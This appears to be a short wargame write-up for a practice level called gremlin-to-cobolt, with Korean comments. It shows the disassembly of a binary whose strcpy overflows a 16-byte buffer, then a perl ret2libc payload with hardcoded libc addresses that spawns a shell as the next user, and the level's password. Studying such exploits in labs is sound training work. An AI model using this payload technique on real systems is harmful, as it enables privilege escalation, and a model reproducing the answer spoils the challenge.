gremlin to cobolt

1.ret2libc

[gremlin@localhost gremlin]$ gdb -q cobolt

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048430 <main>:       push   %ebp

0x8048431 <main+1>:     mov    %ebp,%esp

0x8048433 <main+3>:     sub    %esp,16

0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1

0x804843a <main+10>:    jg     0x8048453 <main+35>

0x804843c <main+12>:    push   0x80484d0

0x8048441 <main+17>:    call   0x8048350 <printf>

0x8048446 <main+22>:    add    %esp,4

0x8048449 <main+25>:    push   0

0x804844b <main+27>:    call   0x8048360 <exit>

0x8048450 <main+32>:    add    %esp,4

0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]

0x8048456 <main+38>:    add    %eax,4

0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]

0x804845b <main+43>:    push   %edx

0x804845c <main+44>:    lea    %eax,[%ebp-16]

0x804845f <main+47>:    push   %eax

0x8048460 <main+48>:    call   0x8048370 <strcpy>

0x8048465 <main+53>:    add    %esp,8

0x8048468 <main+56>:    lea    %eax,[%ebp-16]

0x804846b <main+59>:    push   %eax

0x804846c <main+60>:    push   0x80484dc

0x8048471 <main+65>:    call   0x8048350 <printf>

0x8048476 <main+70>:    add    %esp,8

0x8048479 <main+73>:    leave

0x804847a <main+74>:    ret

0x804847b <main+75>:    nop

0x804847c <main+76>:    nop

0x804847d <main+77>:    nop

0x804847e <main+78>:    nop

0x804847f <main+79>:    nop

End of assembler dump.

 

//strcpy사용 bof취약점 존재

//buf크기 16

 

[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print "\x90"x20,"\xe0\x8a\x05\x40","aaaa","\xf9\xbf\x0f\x40";'`

릱릱릱릱릱릱릱릱릱릱?@aaaa廈@

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ my-pass

euid = 502

hacking exposed

 

 

 

2.환경변수

 

공격은 가능하지만 쉬워서 생략

 

 

3.argv[2]를 이용한 공격

 

공격은 가능하지만 쉬워서 생략